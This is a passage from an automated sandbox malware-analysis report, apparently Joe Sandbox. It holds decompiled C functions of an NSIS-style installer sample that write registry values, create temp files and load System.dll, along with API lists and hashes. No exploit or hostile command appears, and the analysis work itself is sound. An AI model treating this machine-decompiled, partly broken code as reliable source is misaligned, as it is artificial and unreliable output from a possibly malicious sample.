                                                                                      				 *(_t39 - 0x10) =  *(_t39 - 0x1c);
                                                                                      				 *(_t39 - 0x44) = E00402DA6(2);
                                                                                      				_t20 = E00402DA6(0x11);
                                                                                      				 *(_t39 - 4) = 1;
                                                                                      				_t21 = E00402E36(_t42, _t34, _t20, 2); // executed
                                                                                      				 *(_t39 + 8) = _t21;
                                                                                      				if(_t21 != __ebx) {
                                                                                      					_t24 = 0;
                                                                                      					if(_t37 == 1) {
                                                                                      						E00402DA6(0x23);
                                                                                      						_t24 = lstrlenW(0x40b5f0) + _t29 + 2;
                                                                                      					}
                                                                                      					if(_t37 == 4) {
                                                                                      						 *0x40b5f0 = E00402D84(3);
                                                                                      						 *((intOrPtr*)(_t39 - 0x38)) = _t33;
                                                                                      						_t24 = _t37;
                                                                                      					}
                                                                                      					if(_t37 == 3) {
                                                                                      						_t24 = E004032B4( *((intOrPtr*)(_t39 - 0x24)), _t30, 0x40b5f0, 0x1800); // executed
                                                                                      					}
                                                                                      					_t25 = RegSetValueExW( *(_t39 + 8),  *(_t39 - 0x44), _t30,  *(_t39 - 0x10), 0x40b5f0, _t24); // executed
                                                                                      					if(_t25 == 0) {
                                                                                      						 *(_t39 - 4) = _t30;
                                                                                      					}
                                                                                      					_push( *(_t39 + 8));
                                                                                      					RegCloseKey();
                                                                                      				}
                                                                                      				 *0x434f88 =  *0x434f88 +  *(_t39 - 4);
                                                                                      				return 0;
                                                                                      			}














                                                                                      APIs
                                                                                      • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nso9723.tmp,00000023,00000011,00000002), ref: 004024D5
                                                                                      • RegSetValueExW.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\nso9723.tmp,00000000,00000011,00000002), ref: 00402515
                                                                                      • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nso9723.tmp,00000000,00000011,00000002), ref: 004025FD
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.26208301659.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.26208278739.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.26208352397.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.26208378873.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.26208407009.000000000040D000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.26208560356.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.26208581287.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.26208601155.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.26208625683.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.26208645954.0000000000440000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.26208667319.0000000000442000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000001.00000002.26208698975.0000000000464000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_xcVh7ZmH4Y.jbxd
                                                                                      Similarity
                                                                                      • API ID: CloseValuelstrlen
                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\nso9723.tmp
                                                                                      • API String ID: 2655323295-2708458960
                                                                                      • Opcode ID: 5fa3ae97acee3c86253f1ec4314ed064f915dff64d639275cc1e961bbdf348f5
                                                                                      • Instruction ID: a32c4fc66ba480c3aafb49ec1434dbeb720bd0d2787204a1d049ba7b64bbfaa1
                                                                                      • Opcode Fuzzy Hash: 5fa3ae97acee3c86253f1ec4314ed064f915dff64d639275cc1e961bbdf348f5
                                                                                      • Instruction Fuzzy Hash: 8B118E71E00119BEEF10AFA5DE49EAEBAB8FF44358F15443AF504F61C1D7B88D40AA58
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 53%
                                                                                      			E00405F14(void* __eflags, intOrPtr _a4) {
                                                                                      				int _t11;
                                                                                      				signed char* _t12;
                                                                                      				long _t16;
                                                                                      				intOrPtr _t18;
                                                                                      				intOrPtr* _t21;
                                                                                      				signed int _t23;
                                                                                      
                                                                                      				E0040653D(0x42fa70, _a4);
                                                                                      				_t21 = E00405EB7(0x42fa70);
                                                                                      				if(_t21 != 0) {
                                                                                      					E004067C4(_t21);
                                                                                      					if(( *0x434f18 & 0x00000080) == 0) {
                                                                                      						L5:
                                                                                      						_t23 = _t21 - 0x42fa70 >> 1;
                                                                                      						while(1) {
                                                                                      							_t11 = lstrlenW(0x42fa70);
                                                                                      							_push(0x42fa70);
                                                                                      							if(_t11 <= _t23) {
                                                                                      								break;
                                                                                      							}
                                                                                      							_t12 = E00406873();
                                                                                      							if(_t12 == 0 || ( *_t12 & 0x00000010) != 0) {
                                                                                      								E00405E58(0x42fa70);
                                                                                      								continue;
                                                                                      							} else {
                                                                                      								goto L1;
                                                                                      							}
                                                                                      						}
                                                                                      						E00405E0C();
                                                                                      						_t16 = GetFileAttributesW(??); // executed
                                                                                      						return 0 | _t16 != 0xffffffff;
                                                                                      					}
                                                                                      					_t18 =  *_t21;
                                                                                      					if(_t18 == 0 || _t18 == 0x5c) {
                                                                                      						goto L1;
                                                                                      					} else {
                                                                                      						goto L5;
                                                                                      					}
                                                                                      				}
                                                                                      				L1:
                                                                                      				return 0;
                                                                                      			}










                                                                                      APIs
                                                                                        • Part of subcall function 0040653D: lstrcpynW.KERNEL32(?,?,00000400,0040369D,00433F00,NSIS Error), ref: 0040654A
                                                                                        • Part of subcall function 00405EB7: CharNextW.USER32(?,?,C:\,?,00405F2B,C:\,C:\,75A43420,?,C:\Users\user\AppData\Local\Temp\,00405C69,?,75A43420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405EC5
                                                                                        • Part of subcall function 00405EB7: CharNextW.USER32(00000000), ref: 00405ECA
                                                                                        • Part of subcall function 00405EB7: CharNextW.USER32(00000000), ref: 00405EE2
                                                                                      • lstrlenW.KERNEL32(C:\,00000000,C:\,C:\,75A43420,?,C:\Users\user\AppData\Local\Temp\,00405C69,?,75A43420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405F6D
                                                                                      • GetFileAttributesW.KERNELBASE(C:\,C:\,C:\,C:\,C:\,C:\,00000000,C:\,C:\,75A43420,?,C:\Users\user\AppData\Local\Temp\,00405C69,?,75A43420,C:\Users\user\AppData\Local\Temp\), ref: 00405F7D
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.26208301659.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_xcVh7ZmH4Y.jbxd
                                                                                      Similarity
                                                                                      • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                                      • String ID: C:\$C:\Users\user\AppData\Local\Temp\
                                                                                      • API String ID: 3248276644-2214159804
                                                                                      • Opcode ID: 442e1b1d96b1c23b6c0207761c3788c7dd97485575ed4e88a223653099446a7a
                                                                                      • Instruction ID: e20fb510edeaf32ba19235dad054e15b0ffac27cf679254cac4fdbc394554759
                                                                                      • Opcode Fuzzy Hash: 442e1b1d96b1c23b6c0207761c3788c7dd97485575ed4e88a223653099446a7a
                                                                                      • Instruction Fuzzy Hash: E3F0F426119D6226DB22333A5C05EAF0554CE9276475A023BF895B12C5DB3C8A43D8AE
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 100%
                                                                                      			E0040605C(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
                                                                                      				intOrPtr _v8;
                                                                                      				short _v12;
                                                                                      				short _t12;
                                                                                      				intOrPtr _t13;
                                                                                      				signed int _t14;
                                                                                      				WCHAR* _t17;
                                                                                      				signed int _t19;
                                                                                      				signed short _t23;
                                                                                      				WCHAR* _t26;
                                                                                      
                                                                                      				_t26 = _a4;
                                                                                      				_t23 = 0x64;
                                                                                      				while(1) {
                                                                                      					_t12 =  *L"nsa"; // 0x73006e
                                                                                      					_t23 = _t23 - 1;
                                                                                      					_v12 = _t12;
                                                                                      					_t13 =  *0x40a57c; // 0x61
                                                                                      					_v8 = _t13;
                                                                                      					_t14 = GetTickCount();
                                                                                      					_t19 = 0x1a;
                                                                                      					_v8 = _v8 + _t14 % _t19;
                                                                                      					_t17 = GetTempFileNameW(_a8,  &_v12, 0, _t26); // executed
                                                                                      					if(_t17 != 0) {
                                                                                      						break;
                                                                                      					}
                                                                                      					if(_t23 != 0) {
                                                                                      						continue;
                                                                                      					} else {
                                                                                      						 *_t26 =  *_t26 & _t23;
                                                                                      					}
                                                                                      					L4:
                                                                                      					return _t17;
                                                                                      				}
                                                                                      				_t17 = _t26;
                                                                                      				goto L4;
                                                                                      			}













                                                                                      APIs
                                                                                      • GetTickCount.KERNEL32 ref: 0040607A
                                                                                      • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,?,0040352B,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00406095
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.26208301659.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_xcVh7ZmH4Y.jbxd
                                                                                      Similarity
                                                                                      • API ID: CountFileNameTempTick
                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\$nsa
                                                                                      • API String ID: 1716503409-944333549
                                                                                      • Opcode ID: 418a87fb760587bef7583f4f3acae06d17b3011fc99645d3e11ea5bfcaa5fca8
                                                                                      • Instruction ID: cc98cbd97bba9fac9576f26979179aa346a2ab2dc3c85b14509754d74f2b81c3
                                                                                      • Opcode Fuzzy Hash: 418a87fb760587bef7583f4f3acae06d17b3011fc99645d3e11ea5bfcaa5fca8
                                                                                      • Instruction Fuzzy Hash: CEF09076B40204FBEB00CF69ED05E9EB7BCEB95750F11803AFA05F7140E6B499648768
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 90%
                                                                                      			E0040640B(void* __ecx, void* __eflags, intOrPtr _a4, int _a8, short* _a12, char* _a16, signed int _a20) {
                                                                                      				int _v8;
                                                                                      				long _t21;
                                                                                      				long _t24;
                                                                                      				char* _t30;
                                                                                      
                                                                                      				asm("sbb eax, eax");
                                                                                      				_v8 = 0x800;
                                                                                      				_t21 = E004063AA(__eflags, _a4, _a8,  ~_a20 & 0x00000100 | 0x00020019,  &_a20); // executed
                                                                                      				_t30 = _a16;
                                                                                      				if(_t21 != 0) {
                                                                                      					L4:
                                                                                      					 *_t30 =  *_t30 & 0x00000000;
                                                                                      				} else {
                                                                                      					_t24 = RegQueryValueExW(_a20, _a12, 0,  &_a8, _t30,  &_v8);
                                                                                      					_t21 = RegCloseKey(_a20);
                                                                                      					_t30[0x7fe] = _t30[0x7fe] & 0x00000000;
                                                                                      					if(_t24 != 0 || _a8 != 1 && _a8 != 2) {
                                                                                      						goto L4;
                                                                                      					}
                                                                                      				}
                                                                                      				return _t21;
                                                                                      			}








                                                                                      APIs
                                                                                      • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000800,00000000,?,00000000,?,?,Call,?,?,00406672,80000002), ref: 00406451
                                                                                      • RegCloseKey.ADVAPI32(?,?,00406672,80000002,Software\Microsoft\Windows\CurrentVersion,Call,Call,Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nso9723.tmp\System.dll), ref: 0040645C
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.26208301659.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_xcVh7ZmH4Y.jbxd
                                                                                      Similarity
                                                                                      • API ID: CloseQueryValue
                                                                                      • String ID: Call
                                                                                      • API String ID: 3356406503-1824292864
                                                                                      • Opcode ID: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
                                                                                      • Instruction ID: a8d415a3dc4e4479eaaa65942f717852bb8bd3539c12dad3b2e52d491ce509ba
                                                                                      • Opcode Fuzzy Hash: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
                                                                                      • Instruction Fuzzy Hash: FB017C72510209AADF21CF51CC09EDB3BB8FB54364F01803AFD5AA6190D738D968DBA8
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 60%
                                                                                      			E004020D8(void* __ebx, void* __eflags) {
                                                                                      				struct HINSTANCE__* _t23;
                                                                                      				struct HINSTANCE__* _t31;
                                                                                      				void* _t32;
                                                                                      				WCHAR* _t35;
                                                                                      				intOrPtr* _t36;
                                                                                      				void* _t37;
                                                                                      				void* _t39;
                                                                                      
                                                                                      				_t32 = __ebx;
                                                                                      				asm("sbb eax, 0x434fc0");
                                                                                      				 *(_t39 - 4) = 1;
                                                                                      				if(__eflags < 0) {
                                                                                      					_push(0xffffffe7);
                                                                                      					L15:
                                                                                      					E00401423();
                                                                                      					L16:
                                                                                      					 *0x434f88 =  *0x434f88 +  *(_t39 - 4);
                                                                                      					return 0;
                                                                                      				}
                                                                                      				_t35 = E00402DA6(0xfffffff0);
                                                                                      				 *((intOrPtr*)(_t39 - 0x44)) = E00402DA6(1);
                                                                                      				if( *((intOrPtr*)(_t39 - 0x20)) == __ebx) {
                                                                                      					L3:
                                                                                      					_t23 = LoadLibraryExW(_t35, _t32, 8); // executed
                                                                                      					_t47 = _t23 - _t32;
                                                                                      					 *(_t39 + 8) = _t23;
                                                                                      					if(_t23 == _t32) {
                                                                                      						_push(0xfffffff6);
                                                                                      						goto L15;
                                                                                      					}
                                                                                      					L4:
                                                                                      					_t36 = E00406979(_t47,  *(_t39 + 8),  *((intOrPtr*)(_t39 - 0x44)));
                                                                                      					if(_t36 == _t32) {
                                                                                      						E0040559F(0xfffffff7,  *((intOrPtr*)(_t39 - 0x44)));
                                                                                      					} else {
                                                                                      						 *(_t39 - 4) = _t32;
                                                                                      						if( *((intOrPtr*)(_t39 - 0x28)) == _t32) {
                                                                                      							 *_t36( *((intOrPtr*)(_t39 - 8)), 0x400, _t37, 0x40ce50, 0x40a000); // executed
                                                                                      						} else {
                                                                                      							E00401423( *((intOrPtr*)(_t39 - 0x28)));
                                                                                      							if( *_t36() != 0) {
                                                                                      								 *(_t39 - 4) = 1;
                                                                                      							}
                                                                                      						}
                                                                                      					}
                                                                                      					if( *((intOrPtr*)(_t39 - 0x24)) == _t32 && E00403B8C( *(_t39 + 8)) != 0) {
                                                                                      						FreeLibrary( *(_t39 + 8));
                                                                                      					}
                                                                                      					goto L16;
                                                                                      				}
                                                                                      				_t31 = GetModuleHandleW(_t35); // executed
                                                                                      				 *(_t39 + 8) = _t31;
                                                                                      				if(_t31 != __ebx) {
                                                                                      					goto L4;
                                                                                      				}
                                                                                      				goto L3;
                                                                                      			}











                                                                                      APIs
                                                                                      • GetModuleHandleW.KERNELBASE(00000000,00000001,000000F0), ref: 00402103
                                                                                        • Part of subcall function 0040559F: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nso9723.tmp\System.dll,00000000,?,75A423A0,?,?,?,?,?,?,?,?,?,00403418,00000000,?), ref: 004055D7
                                                                                        • Part of subcall function 0040559F: lstrlenW.KERNEL32(00403418,Skipped: C:\Users\user\AppData\Local\Temp\nso9723.tmp\System.dll,00000000,?,75A423A0,?,?,?,?,?,?,?,?,?,00403418,00000000), ref: 004055E7
                                                                                        • Part of subcall function 0040559F: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nso9723.tmp\System.dll,00403418), ref: 004055FA
                                                                                        • Part of subcall function 0040559F: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nso9723.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nso9723.tmp\System.dll), ref: 0040560C
                                                                                        • Part of subcall function 0040559F: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405632
                                                                                        • Part of subcall function 0040559F: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040564C
                                                                                        • Part of subcall function 0040559F: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040565A
                                                                                      • LoadLibraryExW.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 00402114
                                                                                      • FreeLibrary.KERNEL32(?,?,000000F7,?,?,00000008,00000001,000000F0), ref: 00402191
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.26208301659.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_xcVh7ZmH4Y.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                                                                                      • String ID:
                                                                                      • API String ID: 334405425-0
                                                                                      • Opcode ID: 8fc0b63074c346d1d24f62ec551aba281f6c9b66b265cbc2eeb406f1c7e57b21
                                                                                      • Instruction ID: d1cf9917c249e547a3b1759614bc69e8b445b1996c4dbd71fd6f6dd46acd7470
                                                                                      • Opcode Fuzzy Hash: 8fc0b63074c346d1d24f62ec551aba281f6c9b66b265cbc2eeb406f1c7e57b21
                                                                                      • Instruction Fuzzy Hash: 2A21C231904104FACF11AFA5CE48A9D7A71BF48358F20413BF605B91E1DBBD8A82965D
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 86%
                                                                                      			E0040259E(int* __ebx, intOrPtr __edx, short* __edi) {
                                                                                      				void* _t9;
                                                                                      				int _t10;
                                                                                      				long _t13;
                                                                                      				int* _t16;
                                                                                      				intOrPtr _t21;
                                                                                      				short* _t22;
                                                                                      				void* _t24;
                                                                                      				void* _t26;
                                                                                      				void* _t29;
                                                                                      
                                                                                      				_t22 = __edi;
                                                                                      				_t21 = __edx;
                                                                                      				_t16 = __ebx;
                                                                                      				_t9 = E00402DE6(_t29, 0x20019); // executed
                                                                                      				_t24 = _t9;
                                                                                      				_t10 = E00402D84(3);
                                                                                      				 *((intOrPtr*)(_t26 - 0x10)) = _t21;
                                                                                      				 *__edi = __ebx;
                                                                                      				if(_t24 == __ebx) {
                                                                                      					 *((intOrPtr*)(_t26 - 4)) = 1;
                                                                                      				} else {
                                                                                      					 *(_t26 + 8) = 0x3ff;
                                                                                      					if( *((intOrPtr*)(_t26 - 0x20)) == __ebx) {
                                                                                      						_t13 = RegEnumValueW(_t24, _t10, __edi, _t26 + 8, __ebx, __ebx, __ebx, __ebx);
                                                                                      						__eflags = _t13;
                                                                                      						if(_t13 != 0) {
                                                                                      							 *((intOrPtr*)(_t26 - 4)) = 1;
                                                                                      						}
                                                                                      					} else {
                                                                                      						RegEnumKeyW(_t24, _t10, __edi, 0x3ff); // executed
                                                                                      					}
                                                                                      					_t22[0x3ff] = _t16;
                                                                                      					_push(_t24);
                                                                                      					RegCloseKey();
                                                                                      				}
                                                                                      				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t26 - 4));
                                                                                      				return 0;
                                                                                      			}













                                                                                      APIs
                                                                                      • RegEnumKeyW.ADVAPI32(00000000,00000000,?,000003FF), ref: 004025D1
                                                                                      • RegEnumValueW.ADVAPI32(00000000,00000000,?,?), ref: 004025E4
                                                                                      • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nso9723.tmp,00000000,00000011,00000002), ref: 004025FD
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.26208301659.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_xcVh7ZmH4Y.jbxd
                                                                                      Similarity
                                                                                      • API ID: Enum$CloseValue
                                                                                      • String ID:
                                                                                      • API String ID: 397863658-0
                                                                                      • Opcode ID: eb877c1892a8007c8d5756c2053a66096deea000915ae606c9df5557c0642565
                                                                                      • Instruction ID: 08080f496e1fbaad801da7c4a2f11cdf7a22a5a493a276a89d416976773fa01e
                                                                                      • Opcode Fuzzy Hash: eb877c1892a8007c8d5756c2053a66096deea000915ae606c9df5557c0642565
                                                                                      • Instruction Fuzzy Hash: 89017CB1A04105ABEB159F94DE58AAEB66CEF40348F10403AF501B61C0EBB85E44966D
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 86%
                                                                                      			E004015C1(short __ebx, void* __eflags) {
                                                                                      				void* _t17;
                                                                                      				int _t23;
                                                                                      				void* _t25;
                                                                                      				signed char _t26;
                                                                                      				short _t28;
                                                                                      				short _t31;
                                                                                      				short* _t34;
                                                                                      				void* _t36;
                                                                                      
                                                                                      				_t28 = __ebx;
                                                                                      				 *(_t36 + 8) = E00402DA6(0xfffffff0);
                                                                                      				_t17 = E00405EB7(_t16);
                                                                                      				_t32 = _t17;
                                                                                      				if(_t17 != __ebx) {
                                                                                      					do {
                                                                                      						_t34 = E00405E39(_t32, 0x5c);
                                                                                      						_t31 =  *_t34;
                                                                                      						 *_t34 = _t28;
                                                                                      						if(_t31 != _t28) {
                                                                                      							L5:
                                                                                      							_t25 = E00405AEB( *(_t36 + 8));
                                                                                      						} else {
                                                                                      							_t42 =  *((intOrPtr*)(_t36 - 0x28)) - _t28;
                                                                                      							if( *((intOrPtr*)(_t36 - 0x28)) == _t28 || E00405B08(_t42) == 0) {
                                                                                      								goto L5;
                                                                                      							} else {
                                                                                      								_t25 = E00405A6E( *(_t36 + 8)); // executed
                                                                                      							}
                                                                                      						}
                                                                                      						if(_t25 != _t28) {
                                                                                      							if(_t25 != 0xb7) {
                                                                                      								L9:
                                                                                      								 *((intOrPtr*)(_t36 - 4)) =  *((intOrPtr*)(_t36 - 4)) + 1;
                                                                                      							} else {
                                                                                      								_t26 = GetFileAttributesW( *(_t36 + 8)); // executed
                                                                                      								if((_t26 & 0x00000010) == 0) {
                                                                                      									goto L9;
                                                                                      								}
                                                                                      							}
                                                                                      						}
                                                                                      						 *_t34 = _t31;
                                                                                      						_t32 = _t34 + 2;
                                                                                      					} while (_t31 != _t28);
                                                                                      				}
                                                                                      				if( *((intOrPtr*)(_t36 - 0x2c)) == _t28) {
                                                                                      					_push(0xfffffff5);
                                                                                      					E00401423();
                                                                                      				} else {
                                                                                      					E00401423(0xffffffe6);
                                                                                      					E0040653D(0x441000,  *(_t36 + 8));
                                                                                      					_t23 = SetCurrentDirectoryW( *(_t36 + 8)); // executed
                                                                                      					if(_t23 == 0) {
                                                                                      						 *((intOrPtr*)(_t36 - 4)) =  *((intOrPtr*)(_t36 - 4)) + 1;
                                                                                      					}
                                                                                      				}
                                                                                      				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t36 - 4));
                                                                                      				return 0;
                                                                                      			}












                                                                                      APIs
                                                                                        • Part of subcall function 00405EB7: CharNextW.USER32(?,?,C:\,?,00405F2B,C:\,C:\,75A43420,?,C:\Users\user\AppData\Local\Temp\,00405C69,?,75A43420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405EC5
                                                                                        • Part of subcall function 00405EB7: CharNextW.USER32(00000000), ref: 00405ECA
                                                                                        • Part of subcall function 00405EB7: CharNextW.USER32(00000000), ref: 00405EE2
                                                                                      • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A
                                                                                        • Part of subcall function 00405A6E: CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405AB1
                                                                                      • SetCurrentDirectoryW.KERNELBASE(?,00441000,?,00000000,000000F0), ref: 0040164D
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.26208301659.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_xcVh7ZmH4Y.jbxd
                                                                                      Similarity
                                                                                      • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                                                      • String ID:
                                                                                      • API String ID: 1892508949-0
                                                                                      • Opcode ID: b33db422fb51fa5ecbdb099e32eb378baf88cce1f79279cf93775203c76b05d0
                                                                                      • Instruction ID: 910f9ca0e916fbda017ea5bccd1daba2d9720f9cae8b5c5670dceb894c5ef12e
                                                                                      • Opcode Fuzzy Hash: b33db422fb51fa5ecbdb099e32eb378baf88cce1f79279cf93775203c76b05d0
                                                                                      • Instruction Fuzzy Hash: 3E11D031504110EBCF216FA5CD4099F36A0EF25369B28493BE945B52F1DA3E4A829A8E
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 84%
                                                                                      			E0040252A(int* __ebx, char* __edi) {
                                                                                      				void* _t17;
                                                                                      				short* _t18;
                                                                                      				void* _t35;
                                                                                      				void* _t37;
                                                                                      				void* _t40;
                                                                                      
                                                                                      				_t33 = __edi;
                                                                                      				_t27 = __ebx;
                                                                                      				_t17 = E00402DE6(_t40, 0x20019); // executed
                                                                                      				_t35 = _t17;
                                                                                      				_t18 = E00402DA6(0x33);
                                                                                      				 *__edi = __ebx;
                                                                                      				if(_t35 == __ebx) {
                                                                                      					 *(_t37 - 4) = 1;
                                                                                      				} else {
                                                                                      					 *(_t37 - 0x10) = 0x800;
                                                                                      					if(RegQueryValueExW(_t35, _t18, __ebx, _t37 + 8, __edi, _t37 - 0x10) != 0) {
                                                                                      						L7:
                                                                                      						 *_t33 = _t27;
                                                                                      						 *(_t37 - 4) = 1;
                                                                                      					} else {
                                                                                      						if( *(_t37 + 8) == 4) {
                                                                                      							__eflags =  *(_t37 - 0x20) - __ebx;
                                                                                      							 *(_t37 - 4) = 0 |  *(_t37 - 0x20) == __ebx;
                                                                                      							E00406484(__edi,  *__edi);
                                                                                      						} else {
                                                                                      							if( *(_t37 + 8) == 1 ||  *(_t37 + 8) == 2) {
                                                                                      								 *(_t37 - 4) =  *(_t37 - 0x20);
                                                                                      								_t33[0x7fe] = _t27;
                                                                                      							} else {
                                                                                      								goto L7;
                                                                                      							}
                                                                                      						}
                                                                                      					}
                                                                                      					_push(_t35);
                                                                                      					RegCloseKey();
                                                                                      				}
                                                                                      				 *0x434f88 =  *0x434f88 +  *(_t37 - 4);
                                                                                      				return 0;
                                                                                      			}









                                                                                      APIs
                                                                                      • RegQueryValueExW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,?,00000033), ref: 0040255B
                                                                                      • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nso9723.tmp,00000000,00000011,00000002), ref: 004025FD
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.26208301659.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_xcVh7ZmH4Y.jbxd
                                                                                      Similarity
                                                                                      • API ID: CloseQueryValue
                                                                                      • String ID:
                                                                                      • API String ID: 3356406503-0
                                                                                      • Opcode ID: 43fb8dda78ad99cc5dd4f22d664c311adf40e2f39c05d722184b5c87af473be2
                                                                                      • Instruction ID: 3e5dab0bbcc9b7b4348569693e39c51bc0b27c59e8ea0ed6abb05ebc10b9b344
                                                                                      • Opcode Fuzzy Hash: 43fb8dda78ad99cc5dd4f22d664c311adf40e2f39c05d722184b5c87af473be2
                                                                                      • Instruction Fuzzy Hash: 5F116D71900219EADF14DFA4DA589AE77B4FF04345B20443BE401B62C0E7B88A45EB5D
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 69%
                                                                                      			E00401389(signed int _a4) {
                                                                                      				intOrPtr* _t6;
                                                                                      				void* _t8;
                                                                                      				void* _t10;
                                                                                      				signed int _t11;
                                                                                      				void* _t12;
                                                                                      				signed int _t16;
                                                                                      				signed int _t17;
                                                                                      				void* _t18;
                                                                                      
                                                                                      				_t17 = _a4;
                                                                                      				while(_t17 >= 0) {
                                                                                      					_t6 = _t17 * 0x1c +  *0x434f30;
                                                                                      					if( *_t6 == 1) {
                                                                                      						break;
                                                                                      					}
                                                                                      					_push(_t6); // executed
                                                                                      					_t8 = E00401434(); // executed
                                                                                      					if(_t8 == 0x7fffffff) {
                                                                                      						return 0x7fffffff;
                                                                                      					}
                                                                                      					_t10 = E0040136D(_t8);
                                                                                      					if(_t10 != 0) {
                                                                                      						_t11 = _t10 - 1;
                                                                                      						_t16 = _t17;
                                                                                      						_t17 = _t11;
                                                                                      						_t12 = _t11 - _t16;
                                                                                      					} else {
                                                                                      						_t12 = _t10 + 1;
                                                                                      						_t17 = _t17 + 1;
                                                                                      					}
                                                                                      					if( *((intOrPtr*)(_t18 + 0xc)) != 0) {
                                                                                      						 *0x433eec =  *0x433eec + _t12;
                                                                                      						SendMessageW( *(_t18 + 0x18), 0x402, MulDiv( *0x433eec, 0x7530,  *0x433ed4), 0); // executed
                                                                                      					}
